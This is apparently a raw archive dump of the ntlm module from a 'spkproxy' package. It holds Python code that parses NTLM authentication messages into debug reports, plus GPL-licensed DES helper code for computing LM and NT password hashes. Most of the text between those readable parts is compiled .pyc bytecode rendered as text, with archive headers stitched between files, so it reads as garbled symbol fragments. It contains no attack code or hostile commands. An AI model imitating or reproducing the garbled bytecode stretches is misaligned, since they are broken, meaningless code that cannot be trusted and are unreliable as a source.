utils.str2prn_str(bin_str, ' ') res = res + 'Decimal: %s\n' % utils.str2dec(bin_str, ' ') return res #--------------------------------------------------------------------- def debug_message1(msg): "" m_ = base64.decodestring(msg) m_hex = utils.str2hex(m_) res = '' res = res + '==============================================================\n' res = res + 'NTLM Message 1 report:\n' res = res + '---------------------------------\n' res = res + 'Base64: %s\n' % msg res = res + 'String: %s\n' % utils.str2prn_str(m_) res = res + 'Hex: %s\n' % m_hex cur = 0 res = res + '---------------------------------\n' cur_len = 12 res = res + 'Header %d/%d:\n%s\n\n' % (cur, cur_len, m_hex[0:24]) res = res + '%s\nmethod name 0/8\n%s # C string\n\n' % (m_hex[0:16], utils.str2prn_str(m_[0:8])) res = res + '0x%s%s # message type\n' % (m_hex[18:20], m_hex[16:18]) res = res + '%s # delimiter (zeros)\n' % m_hex[20:24] cur = cur + cur_len res = res + '---------------------------------\n' cur_len = 4 res = res + 'Flags %d/%d\n' % (cur, cur_len) res = res + flags(m_[cur: cur + cur_len]) cur = cur + cur_len res = res + '---------------------------------\n' cur_len = len(m_) - cur res = res + 'Rest of the message %d/%d:\n' % (cur, cur_len) res = res + unknown_part(m_[cur: cur + cur_len]) res = res + '\nEnd of message 1 report.\n' return res #--------------------------------------------------------------------- def debug_message2(msg): "" m_ = base64.decodestring(msg) m_hex = utils.str2hex(m_) res = '' res = res + '==============================================================\n' res = res + 'NTLM Message 2 report:\n' res = res + '---------------------------------\n' res = res + 'Base64: %s\n' % msg res = res + 'String: %s\n' % utils.str2prn_str(m_) res = res + 'Hex: %s\n' % m_hex cur = 0 res = res + '---------------------------------\n' cur_len = 12 res = res + 'Header %d/%d:\n%s\n\n' % (cur, cur_len, m_hex[0:24]) res = res + '%s\nmethod name 0/8\n%s # C string\n\n' % (m_hex[0:16], utils.str2prn_str(m_[0:8])) res = res + '0x%s%s # message type\n' % (m_hex[18:20], m_hex[16:18]) res = res + '%s # delimiter (zeros)\n' % m_hex[20:24] cur = cur + cur_len res = res + '---------------------------------\n' cur_len = 8 res = res + 'Lengths and Positions %d/%d\n%s\n\n' % (cur, cur_len, m_hex[cur * 2 :(cur + cur_len) * 2]) cur_len = 8 res = res + 'Domain ??? %d/%d\n' % (cur, cur_len) dom = item(m_[cur:cur+cur_len]) res = res + dom['string'] cur = cur + cur_len res = res + '---------------------------------\n' cur_len = 4 res = res + 'Flags %d/%d\n' % (cur, cur_len) res = res + flags(m_[cur: cur + cur_len]) cur = cur + cur_len res = res + '---------------------------------\n' cur_len = 8 res = res + 'NONCE %d/%d\n%s\n\n' % (cur, cur_len, m_hex[cur * 2 :(cur + cur_len) * 2]) cur = cur + cur_len res = res + '---------------------------------\n' cur_len = dom['offset'] - cur res = res + 'Unknown data %d/%d:\n' % (cur, cur_len) res = res + unknown_part(m_[cur: cur + cur_len]) cur = cur + cur_len res = res + '---------------------------------\n' cur_len = dom['len1'] res = res + 'Domain ??? %d/%d:\n' % (cur, cur_len) res = res + 'Hex: %s\n' % m_hex[cur * 2: (cur + cur_len) * 2] res = res + 'String: %s\n\n' % utils.str2prn_str(m_[cur : cur + cur_len]) cur = cur + cur_len res = res + '---------------------------------\n' cur_len = len(m_) - cur res = res + 'Rest of the message %d/%d:\n' % (cur, cur_len) res = res + unknown_part(m_[cur: cur + cur_len]) res = res + '\nEnd of message 2 report.\n' return res #--------------------------------------------------------------------- def debug_message3(msg): "" m_ = base64.decodestring(msg) m_hex = utils.str2hex(m_) res = '' res = res + '==============================================================\n' res = res + 'NTLM Message 3 report:\n' res = res + '---------------------------------\n' res = res + 'Base64: %s\n' % msg res = res + 'String: %s\n' % utils.str2prn_str(m_) res = res + 'Hex: %s\n' % m_hex cur = 0 res = res + '---------------------------------\n' cur_len = 12 res = res + 'Header %d/%d:\n%s\n\n' % (cur, cur_len, m_hex[0:24]) res = res + '%s\nmethod name 0/8\n%s # C string\n\n' % (m_hex[0:16], utils.str2prn_str(m_[0:8])) res = res + '0x%s%s # message type\n' % (m_hex[18:20], m_hex[16:18]) res = res + '%s # delimiter (zeros)\n' % m_hex[20:24] cur = cur + cur_len res = res + '---------------------------------\n' cur_len = 48 res = res + 'Lengths and Positions %d/%d\n%s\n\n' % (cur, cur_len, m_hex[cur * 2 :(cur + cur_len) * 2]) cur_len = 8 res = res + 'LAN Manager response %d/%d\n' % (cur, cur_len) lmr = item(m_[cur:cur+cur_len]) res = res + lmr['string'] cur = cur + cur_len cur_len = 8 res = res + 'NT response %d/%d\n' % (cur, cur_len) ntr = item(m_[cur:cur+cur_len]) res = res + ntr['string'] cur = cur + cur_len cur_len = 8 res = res + 'Domain string %d/%d\n' % (cur, cur_len) dom = item(m_[cur:cur+cur_len]) res = res + dom['string'] cur = cur + cur_len cur_len = 8 res = res + 'User string %d/%d\n' % (cur, cur_len) user = item(m_[cur:cur+cur_len]) res = res + user['string'] cur = cur + cur_len cur_len = 8 res = res + 'Host string %d/%d\n' % (cur, cur_len) host = item(m_[cur:cur+cur_len]) res = res + host['string'] cur = cur + cur_len cur_len = 8 res = res + 'Unknow item record %d/%d\n' % (cur, cur_len) unknown = item(m_[cur:cur+cur_len]) res = res + unknown['string'] cur = cur + cur_len res = res + '---------------------------------\n' cur_len = 4 res = res + 'Flags %d/%d\n' % (cur, cur_len) res = res + flags(m_[cur: cur + cur_len]) cur = cur + cur_len res = res + '---------------------------------\n' cur_len = dom['len1'] + user['len1'] + host['len1'] res = res + 'Domain, User, Host strings %d/%d\n%s\n%s\n\n' % (cur, cur_len, m_hex[cur * 2 :(cur + cur_len) * 2], utils.str2prn_str(m_[cur:cur + cur_len])) cur_len = dom['len1'] res = res + '%s\n' % m_hex[cur * 2: (cur + cur_len) * 2] res = res + 'Domain name %d/%d:\n' % (cur, cur_len) res = res + '%s\n\n' % (utils.str2prn_str(m_[cur: (cur + cur_len)])) cur = cur + cur_len cur_len = user['len1'] res = res + '%s\n' % m_hex[cur * 2: (cur + cur_len) * 2] res = res + 'User name %d/%d:\n' % (cur, cur_len) res = res + '%s\n\n' % (utils.str2prn_str(m_[cur: (cur + cur_len)])) cur = cur + cur_len cur_len = host['len1'] res = res + '%s\n' % m_hex[cur * 2: (cur + cur_len) * 2] res = res + 'Host name %d/%d:\n' % (cur, cur_len) res = res + '%s\n\n' % (utils.str2prn_str(m_[cur: (cur + cur_len)])) cur = cur + cur_len res = res + '---------------------------------\n' cur_len = lmr['len1'] res = res + 'LAN Manager response %d/%d\n%s\n\n' % (cur, cur_len, m_hex[cur * 2 :(cur + cur_len) * 2]) cur = cur + cur_len res = res + '---------------------------------\n' cur_len = ntr['len1'] res = res + 'NT response %d/%d\n%s\n\n' % (cur, cur_len, m_hex[cur * 2 :(cur + cur_len) * 2]) cur = cur + cur_len res = res + '---------------------------------\n' cur_len = len(m_) - cur res = res + 'Rest of the message %d/%d:\n' % (cur, cur_len) res = res + unknown_part(m_[cur: cur + cur_len]) res = res + '\nEnd of message 3 report.\n' return res spkproxy/ntlm/ntlm_procs.pyc0100664000076500007650000000374507562544430015303 0ustar davedave- =csUdkZdkZdkZdkZdZ,dZIdZdS(Ncsd} ti|dd!}!||i|dd!}#ti|dd!}$||i|dd!}&ti|dd!}'||i|dd!})|SdS(skeys_str - hashed passwordsiiiiiN(sressdessDESskeys_strsdobjsencrypts plain_text(skeys_strs plain_textsdobjsres((sntlm/ntlm_procs.pys calc_resps cs,-.0dd}2ti|}4t|djo5||t|d}n6|dd!}:dddddd d d g};ti|}=d }>t i |dd !}?||i |}At i |d d!}B||i |}E|d}G|SdS(ssetup LanManager passwordsiiiKiGiSi!i@i#i$i%sisN(slm_pwsstringsupperspasswdslens magic_lsts ntlmutilsslst2strs magic_strsressdessDESsdobjsencrypt(spasswds magic_strslm_pwsress magic_lstsdobj((sntlm/ntlm_procs.pyscreate_LM_hashed_password,s  !  cs^IJMti|}Pti}Q|i|S|i}V|d}X|SdS(screate NT hashed passwordsN( s ntlmutilss str2unicodespasswdspwsmd4snews md4_contextsupdatesdigestsres(spasswds md4_contextspwsres((sntlm/ntlm_procs.pyscreate_NT_hashed_passwordIs (sstringsdessmd4s ntlmutilss calc_respscreate_LM_hashed_passwordscreate_NT_hashed_password(screate_NT_hashed_passwords calc_respscreate_LM_hashed_passwordsstrings ntlmutilssdessmd4((sntlm/ntlm_procs.pys?s  spkproxy/ntlm/des_c.pyc0100664000076500007650000002371707562544343014204 0ustar davedave- 7=cs dklZdZ"dZAdZJdZRdZ[dZ|dklZl Z ~dZ d Z d Z d d d d d d d d d d d d d d d d gZ d fdYZdZdZdZdS((sU32csut|d}|t|dd>B}|t|dd>B}|t|dd>B} |SdS( schar[4] to unsigned longiiiiiiiN(sU32scsl(scsl((s ntlm/des_c.pysc2ls cs."#$||}%tdtdf\}}'d}(|djo()|t|dd>B}*d}n+|p |djo(,|t|dd>B}-d}n.|p |djo(/|t|dd>B}0d}n1|p |djo$2|t|d B}3d}n4|p |d jo(5|t|d d>B}6d}n7|p |d jo(8|t|d d>B}9d}n:|p |d jo(;|t|dd>B}<d}n=|p |djo>|t|dB}n?||fSd S( schar[n] to two unsigned long???iiiiiiiiiiiN(scsnsU32sl1sl2sf(scsl1sl2snsf((s ntlm/des_c.pysc2ln"s8 !        csABCg}D|it|td@E|it|d?td@F|it|d?td@G|it|d?td@H|SdS(sunsigned long to char[4]iiiiN(scsappendsintslsU32(slsc((s ntlm/des_c.pysl2cAs  $$$csuJKLt|dd>}M|t|dd>B}N|t|dd>B}O|t|dB}P|SdS( snetwork to host longiiiiiiiN(sU32scsl(scsl((s ntlm/des_c.pysn2lJs csRSTg}U|it|d?td@V|it|d?td@W|it|d?td@X|it|td@Y|SdS(shost to network longiiiiN(scsappendsintslsU32(slsc((s ntlm/des_c.pysl2nRs $$$ csk[\]x't|D]]}]|idqW^d}_|p |djo.`t|d?td@|d<ad}nb|p |djo.ct|d?td@|d<dd}ne|p |djo.ft|d?td@|d <gd}nh|p |d jo*it|td@|d <jd}nk|p |d jo.lt|d?td@|d <md}nn|p |d jo.ot|d?td@|d <pd}nq|p |d jo.rt|d?td@|d<sd}nt|p |djo*ut|td@|d<vd}nw|| Sd S(siiiiiiiiiiiiN( srangesnsiscsappendsfsintsl2sU32sl1(sl1sl2scsnsisf((s ntlm/des_c.pysl2cn[s<  ! ! !  ! ! !  (s des_SPtranssdes_skbcsq~|\}}}|||A}|||dA}|d?|d>}|tdt|t d@tdt|d?t d@Btdt|d?t d@Btd t|d ?t d@Btd t|t d@Btd t|d?t d@Btdt|d?t d@Btd t|d ?t d@BA}|||f|||fSdS(Niiii?iiiiiiiii( stupsLsRsSsssusts des_SPtranssintsU32(stupsustsssSsRsL((s ntlm/des_c.pys D_ENCRYPT~s cs_|\}}}||?|A|@}||A}|||>A}|||fSdS(stup - (a, b, t)N(stupsasbstsnsm(stupsnsmsasbst((s ntlm/des_c.pysPERM_OPs  csX|\}}|d|>|A|@}||A|d|?A}||fSdS(s tup - (a, t)iN(stupsastsnsm(stupsnsmsast((s ntlm/des_c.pysHPERM_OPs iisDEScs8tZeZdZdZdZRS(NcsOg}x'|D]}|it|qWt||_dS(N(skeyskey_strsisappendsords des_set_keysselfsKeySched(sselfskey_strskeysi((s ntlm/des_c.pys__init__s   csg}x'|D]}|it|qWt||id}d}x$|D]}|t |}qdW|SdS(Nis( sblocksstrsisappendsordsdes_ecb_encryptsselfsKeySchedsresschr(sselfsstrsblocksisres((s ntlm/des_c.pysdecrypts    csg}x'|D]}|it|qWt||id}d}x$|D]}|t |}qdW|SdS(Nis( sblocksstrsisappendsordsdes_ecb_encryptsselfsKeySchedsresschr(sselfsstrsblocksisres((s ntlm/des_c.pysencrypts    (s__name__s __module__sNonesKeyScheds__init__sdecryptsencrypt(((s ntlm/des_c.pysDESs    c sC|d}|d} td}td}t| ||fdtd\} }}t|| |fdtd\}} }t| ||fdtd\} }}t|| |fd td \}} }t| ||fdtd \} }}| d>| d ?B}|d>|d ?B} |}|}|oxt dd dD]}t || |df|||\}}}}|d}|d} t | ||df|||\}}}}|d} |d}qxWnxt dddD]}t || |df|||\}}}}|d}|d} t | ||df|||\}}}}|d} |d}q5W|d?|d >B}| d?| d >B} t| ||fdtd \} }}t|| |fd td \}} }t| ||fdtd\} }}t|| |fdtd\}} }t| ||fdtd\} }}|g} | i| tdtdtdtdf\}} }}| SdS(Niiililil33ffillUU*ii ii(sinputslsrsU32stsusPERM_OPskssssencryptsrangesis D_ENCRYPTsrtupsoutputsappend( sinputskssencryptsislsrtupsssustsoutputsr((s ntlm/des_c.pys des_encriptsR  -----    1  1  1  1 ----- 9cst|dd!}t|dd!}|g}|i| t|||} |d} |d}t |}|t |}t dt dt dt df\}}|d<|d<|SdS(Niiii( sc2lsinputsl0sl1sllsappends des_encriptskssencryptsl2csoutputsU32(sinputskssencryptsoutputsllsl0sl1((s ntlm/des_c.pysdes_ecb_encrypts   AcsF g}!t|dd!}"t|dd!}#td}%t|||fdtd\}}}&t||fdtd\}}'t||fdtd\}}(t|||fdtd\}}})t|||fdtd \}}}*t|||fdtd\}}},|td @d >|td @B|td @d ?B|td@d?B}-|td@}/xt d D/]v}0t |o.1|d?|d>B}2|d?|d>B}n+4|d?|d>B}5|d?|d>B}6|td@}7|td@}9t dt |td@t dt |d?td@|d?td@BBt dt |d?td@|d?td@BBt dt |d?td@|d?td@B|d?td@BB}>t dt |td@t d t |d?td@|d?td@BBt dt |d?td@Bt dt |d?td@|d?td@BB}D|i|d >|td!@Btd"@E|d ?|td#@B}F|d>|d$?B}G|i|td"@qWI|}K|SdS(%NiiilililUU*llilll`liiii?iiii<i iii0iiii8illli(sksc2lskeyscsdsU32stsPERM_OPsHPERM_OPsrangesisshifts2sdes_skbsintsssappendsschedule(skeyscsdsschedulesiskssst((s ntlm/des_c.pys des_set_keys: -''---I , N(sU32sc2lsc2lnsl2csn2lsl2nsl2cnsdes_datas des_SPtranssdes_skbs D_ENCRYPTsPERM_OPsHPERM_OPsshifts2sDESs des_encriptsdes_ecb_encrypts des_set_key(sl2cs des_SPtranssn2lsl2cnsdes_ecb_encryptsDESsdes_skbsl2nsshifts2sPERM_OPsHPERM_OPsU32s des_encripts des_set_keys D_ENCRYPTsc2lnsc2l((s ntlm/des_c.pys?s    !   9$ 9 spkproxy/ntlm/U32.pyc0100664000076500007650000001260307562544343013470 0ustar davedave- 7=cs2dZdZdfdYZdS(l@cs|d@SdS(Nl(sn(sn((s ntlm/U32.pysnormssU32cs:tZdZddZ!ddZ$dZ'dZ(dZ)dZ+d Z 0d Z 7d Z <d Z Ad Z FdZGdZHdZJdZOdZTdZYdZ^dZcdZhdZkdZndZsdZRS(Nlics)tttt||_dS(N(sCsnormsabsslongsvaluesselfsv(sselfsvalue((s ntlm/U32.pys__init__scs)!"tttt||_dS(N(sCsnormsabsslongsvaluesselfsv(sselfsvalue((s ntlm/U32.pysset!scs$%tt|iSdS(N(shexsnormsselfsv(sself((s ntlm/U32.pys__repr__$scs''tt|iSdS(N(slongsnormsselfsv(sself((s ntlm/U32.pys__long__'scs((tt|iSdS(N(sintsnormsselfsv(sself((s ntlm/U32.pys__int__(scs))tt|iSdS(N(schrsnormsselfsv(sself((s ntlm/U32.pys__chr__)scs:+,t}-tt|i|i|_.|SdS(N(sU32srsCsnormsselfsvsb(sselfsbsr((s ntlm/U32.pys__add__+s  csx01t}2|i|ijo(3ttd|i|i|_n!4tt|i|i|_5|SdS(Nl(sU32srsselfsvsbsCsnorm(sselfsbsr((s ntlm/U32.pys__sub__0s  ( cs:78t}9tt|i|i|_:|SdS(N(sU32srsCsnormsselfsvsb(sselfsbsr((s ntlm/U32.pys__mul__7s  cs@<=t}>tt|it|i|_?|SdS(N(sU32srsCsnormsselfsvsb(sselfsbsr((s ntlm/U32.pys__div__<s &cs@ABt}Ctt|it|i|_D|SdS(N(sU32srsCsnormsselfsvsb(sselfsbsr((s ntlm/U32.pys__mod__As &csFFt|iSdS(N(sU32sselfsv(sself((s ntlm/U32.pys__neg__FscsGGt|iSdS(N(sU32sselfsv(sself((s ntlm/U32.pys__pos__GscsHHt|iSdS(N(sU32sselfsv(sself((s ntlm/U32.pys__abs__Hscs4JKt}Ltt|i|_M|SdS(N(sU32srsCsnormsselfsv(sselfsr((s ntlm/U32.pys __invert__Js cs7OPt}Qtt|i|>|_R|SdS(N(sU32srsCsnormsselfsvsb(sselfsbsr((s ntlm/U32.pys __lshift__Os cs7TUt}Vtt|i|?|_W|SdS(N(sU32srsCsnormsselfsvsb(sselfsbsr((s ntlm/U32.pys __rshift__Ts cs:YZt}[tt|i|i@|_\|SdS(N(sU32srsCsnormsselfsvsb(sselfsbsr((s ntlm/U32.pys__and__Ys  cs:^_t}`tt|i|iB|_a|SdS(N(sU32srsCsnormsselfsvsb(sselfsbsr((s ntlm/U32.pys__or__^s  cs:cdt}ett|i|iA|_f|SdS(N(sU32srsCsnormsselfsvsb(sselfsbsr((s ntlm/U32.pys__xor__cs  cshitt|i SdS(N(sU32snormsselfsv(sself((s ntlm/U32.pys__not__hscsklt|iSdS(N(snormsselfsv(sself((s ntlm/U32.pystruthkscshnot|it|ijo odSn5pt|it|ijo pdSnqdSdS(Niii(snormsselfsvsb(sselfsb((s ntlm/U32.pys__cmp__ns " " csstt|iSdS(N(snormsselfsv(sself((s ntlm/U32.pys __nonzero__ss(s__name__s __module__svs__init__ssets__repr__s__long__s__int__s__chr__s__add__s__sub__s__mul__s__div__s__mod__s__neg__s__pos__s__abs__s __invert__s __lshift__s __rshift__s__and__s__or__s__xor__s__not__struths__cmp__s __nonzero__(((s ntlm/U32.pysU32s2                       N(sCsnormsU32(sCsU32snorm((s ntlm/U32.pys?s  spkproxy/ntlm/des_data.pyc0100664000076500007650000003401307562544343014662 0ustar davedave- 7=cHsY$dklZedededededededededededed ed eded ededed ed edededed ed ed ededededed eded ed eded edededed ed edededededed edededededed eded eded ededed eded edededg@eded ededededededededededededededededededededed ededededededededededededededededed ededededededededededed edededededededededededededg@ed ed!ed"ed#ed$ed%ed#ed&ed'ed(ed)ed*ed+ed,ed*ed-ed ed$ed!ed"ed,ed+ed(ed ed-ed'ed.ed)ed&ed ed%ed.ed!ed"ed*ed(ed,ed$ed)ed#ed ed!ed&ed-ed$ed%ed+ed*ed.ed ed%ed+ed(ed'ed#ed&ed'ed ed-ed,ed ed.ed"ed)g@ed/ed0ed1ed2ed ed3ed4ed5ed6ed7ed8ed9ed7ed/ed:ed8ed;ed<ed=ed1ed<ed4ed3ed=ed9ed ed5ed6ed0ed;ed2ed:ed;ed9ed:ed7ed<ed0ed1ed3ed4ed ed=ed5ed ed;ed6ed=ed8ed2ed/ed:ed2ed1ed0ed/ed5ed<ed3ed4ed9ed8ed7ed6g@ed>ed?ed@edAedBedCedDedEed?edFedGedHedIedBedJed edHed>edKedLedCedDed edGedFedIedAedKedEed@edLedJedJedIedKedEed?edFedGedCed>edHedAed edDed>ed@edKedIed@ed edAedBedJedLed?edHedBedCedLedFedDedEedGg@edMedNed edOedNedPedQedRedSedTedUedVedWedMedXedYedRedQedZed edPed[edOedZedTedXedVedSed[edUedYedWedSedVedWedYedOedNed edWedVedPedZedRedNedTedUed[edTedUedRedQedMedXedYed edPedMedQedOedXedSed[edZg@ed\ed]ed^ed_ed`edaedbed edceddedeedfedgedhedfedeedded\edaed`ed ed^ed_edbediedjedhedgedjedied]edcedjedfediedeed\ed]edcedieddedjedbed ed]ed_edged^ed edded^edbedeed\ed`edcedhedgedaed`ed_edhedfedag@edkedledmed ednedoedpedqedredsedtedmeduedvedwedpedxeduedoednedqedwed edtedsedyedvedkedyedxedledredyedxedwedqedmedsed edtedkedvednedoedledredoednedqedyedpedwedtedmedvedpedredledued edsedkedxedug@gZed ed[edVedMed(edzed{ed|edPedSedWedQed}ed~edededrededededededededededededededededRedNedXedZedededededUedYedOedTededededededededededededededededededededg@ed ed>edededyedededededededededededed=edededededededededededededededededededededededededededededededededededededededededededededededg@ed edgededed%edededed1ededededededededededededededededededededededededsededededededededededededededededededed ed ed ed ed ededededededededg@ed ed:ed@ededFededLeded\edededededededed8ed3ed ed!ed"ed#ed$ed%ed&ed'ed(ed)ed*ed+ed,ed-eded.ed/ed0ed1ed2ed3ed4ed5ed6ed7ed8ed9ed:ed;ed<ed=ed>ed?ed@edAedBedCedDedEedFedGedHedIedJedKedLg@ed eded(edMedededNedOedVedPed{edQedRedSedTedUed:edVedWedXedYedZed[ed\ed]ed^ed_ed`edaedbedcedded\edeedfedgedhediedjedkedledmednedoedpedqedredsededteduedvedwedxedyedzed{ed|ed}ed~ededededg@ed edsedFeded=edededededed1ededededededgedededededededededededededededed>ededGedededededededededededededededededededededededededededededg@ed ed@edReded%edededed[ededNededededededyedededededededededededededededededededededededededededededededededededededededededededededededg@ed ed8ededed1ed7edededededededededededrededededededededededededededededPedededed ed ed ed ed edededededededededededededededededededed ed!ed"ed#g@gZd$S(%(sU32lllllllllllllllll  l l l l l l l lll  ll l l ll@l@l@lll@l@llll@l@ll@l lll l ll l llll l l lll@llAl@llAl@lllAllAl@ll@ll@ll@lll@ll@l@l@ll@lllllllllllllllll @lAl ll @l@l Al llAl Al l ll@ll@l@lll@l@l0l @l0@l l0l @l0@l l0l @l0@l l0l @l0@lll@l@lll@l@l l0l @l0@l l0l @l0@l l0l @l0@l l0l @l0@l l@l @l @ll l@l@l @l @ll$l$l@l@l$@l$@lll$l$l@l@l$@l$@l$l $l@ l@$l @ l @$l$l $l@ l@$l @ l @$l l$l$ l$$l@ l@$l$@ l$@$l l$l$ l$$l@ l@$l$@ l$@$llllllllllllllllllllllllllllllllllllllllllllllllllllllllll l l l ll ll ll ll ll ll ll ll ll ll l$ll$ll$ll$ll$ll$ll$ll$ll$ll$ll$ll$ll$ll$ll$ll$l ll l`l`l@l`l@l`l l"l" l l l"l" l @l `l"@l"`l @l `l"@l"`l ll ll ll l@l`l@l`l@l`l@l`l l"l" l l l"l" l @l `l"@l"`l @l `l"@l"`lllllllllll l lll l lll l lll l llllllllllllllll l lll l lll l lll l lllllllllll@lPlPl@l@lPlPl@l@lPlPl@l@lPlPlllllllllllllll@l@lPlPl@l@lPlPl@l@lPlPl@l@lPlPlll l l l l l l l l l"l"l"l"l l l l l" l" l" l" llllllll(l(l(l(l(l(l(l(l l l l"l"l"l"l (l (l (l (l"(l"(l"(l"(N(sU32s des_SPtranssdes_skb(s des_SPtranssU32sdes_skb((sntlm/des_data.pys?s(3spkproxy/ntlm/md4.pyc0100664000076500007650000002100707562544407013602 0ustar davedave- 7=csddfddfddfddfdd fd d fd d fgZ#dklZ%dfdYZdZdZdZdZdZdZdZ dZ eZ dS(sl A_g9]-4xgk1sal ${7"bdg<,rsabcl rLu+~%;d^$smessage digestl KC :D~ Y sabcdefghijklmnopqrstuvwxyzl ->5GuABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789l p'1gQ3;H`sP12345678901234567890123456789012345678901234567890123456789012345678901234567890l 6Yla!'w(sU32sMD4cs%tZ&eZ'eZ(eZ)eZ*eeef\ZZZ +gZ .dZ 9dZ CdZ TdZdZRS(Ncs.1td|_2td|_3td|_4td|_5tdtdtdf\|_|_|_6dgd|_ dS(Nl#Nl+_l\u1lvTd lii@( sU32sselfsAsBsCsDscountslen1slen2sbuf(sself((s ntlm/md4.pys__init__.s 6cs9:d|ii|ii|ii|iif};|d|ii|ii|i if}<xct dD<]R}=x9t dD=](}>|dt |i||}qW?|d}qWA|SdS(Ns#A = %s, B = %s, C = %s, D = %s. s$count = %s, len1 = %s, len2 = %s. iis%4s s (sselfsAs__repr__sBsCsDsrscountslen1slen2srangesisjshexsbuf(sselfsrsisj((s ntlm/md4.pys__repr__9s=5  &csCEt}G|i|_H|i|_I|i|_J|i|_K|i|_L|i|_M|i |_ Nx1t |i DN]}O|i ||i |t|i jo^|i td|_ n`|i |d>|_ a|i |d?|_ etd}fd}gxagt|djoJhdt|it|jo htdt|i}n i|}jxBtt|Dj]+} j| | ||i| t|it|i| d d>t|i| dd >w| d } q Wy|i}z|i}{|i}||i}~t||||dd| }t||||dd | }t||||d d| }t||||dd| }t||||d d| }t||||dd | }t||||dd| }t||||d d| }t||||d d| }t||||dd | }t||||dd| }t||||dd| }t||||dd| }t||||dd | }t||||dd| }t||||dd| }t||||dd| }t||||d d| }t||||d d| }t||||dd| }t||||dd| }t||||dd| }t||||dd| }t||||dd| }t||||d d| }t||||dd| }t||||dd| }t||||dd| }t||||dd| }t||||d d| }t||||dd| }t||||dd| }t||||dd| }t||||d d| }t||||d d| }t||||dd| }t||||d d| }t||||dd| }t||||dd| }t||||dd| }t||||dd| }t||||dd| }t||||dd| }t||||dd| }t||||dd| }t||||dd| }t||||d d| }t||||dd| }|i||_|i||_|i||_|i||_nqWdS(Niiiii@l@liiiiiii iiii i i i ii(sbufsstrsisappendsordsU32slensilenslongsselfslen1slen2sLsbufposscountsrangesintsXsjsAsBsCsDsf1sf2sf3( sselfsstrsAsCsBsDsilensbufpossLsXsbufsisj((s ntlm/md4.pysupdateTs  * #   )    h    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!csdgd}dgd}dgd}d|d<tdtdtdf\}}}|i}|i }|i }dt |i jo$tdt |i d}ntdt |i }|it|t| |td@|d<|d?td@|d<|d?td@|d <|d ?td@|d <|td@|d <|d?td@|d <|d?td@|d<|d ?td@|d<|it||itd@|d<|id?td@|d<|id?td@|d <|id ?td@|d <|itd@|d <|id?td@|d <|id?td@|d<|id ?td@|d<|itd@|d<|id?td@|d<|id?td@|d<|id ?td@|d<|itd@|d<|id?td@|d<|id?td@|d<|id ?td@|d<t|SdS(Niiii@ii8iiiiiiiiii i i i i ii(sresssspaddingsU32spadlensoldlen1soldlen2sselfs make_copystempslen1slen2slongscountsupdates int_array2strsintsAsBsCsD(sselfstempsresssspaddingspadlensoldlen2soldlen1((s ntlm/md4.pysdigestsL -  $ (s__name__s __module__sNonesAsBsCsDscountslen1slen2sbufs__init__s__repr__s make_copysupdatesdigest(((s ntlm/md4.pysMD4%s        dcs||@||@BSdS(N(sxsysz(sxsysz((s ntlm/md4.pysFscs"||@||@B||@BSdS(N(sxsysz(sxsysz((s ntlm/md4.pysGscs||A|ASdS(N(sxsysz(sxsysz((s ntlm/md4.pysHscs||>|d|?BSdS(Ni (sxsn(sxsn((s ntlm/md4.pysROLscs/t|t||||||SdS(N( sROLsasFsbscsdsXskss(sasbscsdsksssX((s ntlm/md4.pysf1scs9t|t|||||td|SdS(Nly5( sROLsasGsbscsdsXsksU32ss(sasbscsdsksssX((s ntlm/md4.pysf2scs9t|t|||||td|SdS(Nlk]( sROLsasHsbscsdsXsksU32ss(sasbscsdsksssX((s ntlm/md4.pysf3scsAd}x$|D]}|t|}qW|SdS(Ns(sstrsarraysischr(sarraysisstr((s ntlm/md4.pys int_array2strs   N( smd4_testsU32sMD4sFsGsHsROLsf1sf2sf3s int_array2strsnew( sf1sf2sf3sROLsGsFsHsmd4_testsU32snews int_array2strsMD4((s ntlm/md4.pys?sK         spkproxy/ntlm/des.py~0100664000076500007650000000613007562540467013726 0ustar davedave# This file is part of 'NTLM Authorization Proxy Server' # Copyright 2001 Dmitry A. Rozmanov # # NTLM APS is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # NTLM APS is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with the sofware; see the file COPYING. If not, write to the # Free Software Foundation, Inc., # 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA. # import des_c, utils #--------------------------------------------------------------------- class DES: des_c_obj = None #----------------------------------------------------------------- def __init__(self, key_str): "" k = str_to_key56(key_str) k = key56_to_key64(k) key_str = utils.lst2str(k) self.des_c_obj = des_c.DES(key_str) #----------------------------------------------------------------- def encrypt(self, plain_text): "" return self.des_c_obj.encrypt(plain_text) #----------------------------------------------------------------- def decrypt(self, crypted_text): "" return self.des_c_obj.decrypt(crypted_text) #--------------------------------------------------------------------- #Some Helpers #--------------------------------------------------------------------- DESException = 'DESException' #--------------------------------------------------------------------- def str_to_key56(key_str): "" if type(key_str) != type(''): #rise DESException, 'ERROR. Wrong key type.' pass if len(key_str) < 7: key_str = key_str + '\000\000\000\000\000\000\000'[:(7 - len(key_str))] key_56 = [] for i in key_str[:7]: key_56.append(ord(i)) return key_56 #--------------------------------------------------------------------- def key56_to_key64(key_56): "" key = [] for i in range(8): key.append(0) key[0] = key_56[0]; key[1] = ((key_56[0] << 7) & 0xFF) | (key_56[1] >> 1); key[2] = ((key_56[1] << 6) & 0xFF) | (key_56[2] >> 2); key[3] = ((key_56[2] << 5) & 0xFF) | (key_56[3] >> 3); key[4] = ((key_56[3] << 4) & 0xFF) | (key_56[4] >> 4); key[5] = ((key_56[4] << 3) & 0xFF) | (key_56[5] >> 5); key[6] = ((key_56[5] << 2) & 0xFF) | (key_56[6] >> 6); key[7] = (key_56[6] << 1) & 0xFF; key = set_key_odd_parity(key) return key #--------------------------------------------------------------------- def set_key_odd_parity(key): "" for i in range(len(key)): for k in range(7): bit = 0 t = key[i] >> k bit = (t ^ bit) & 0x1 key[i] = (key[i] & 0xFE) | bit return key spkproxy/ntlm/ntlm_procs.py~0100664000076500007650000000525007562540467015335 0ustar davedave# This file is part of 'NTLM Authorization Proxy Server' # Copyright 2001 Dmitry A. Rozmanov # # NTLM APS is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # NTLM APS is 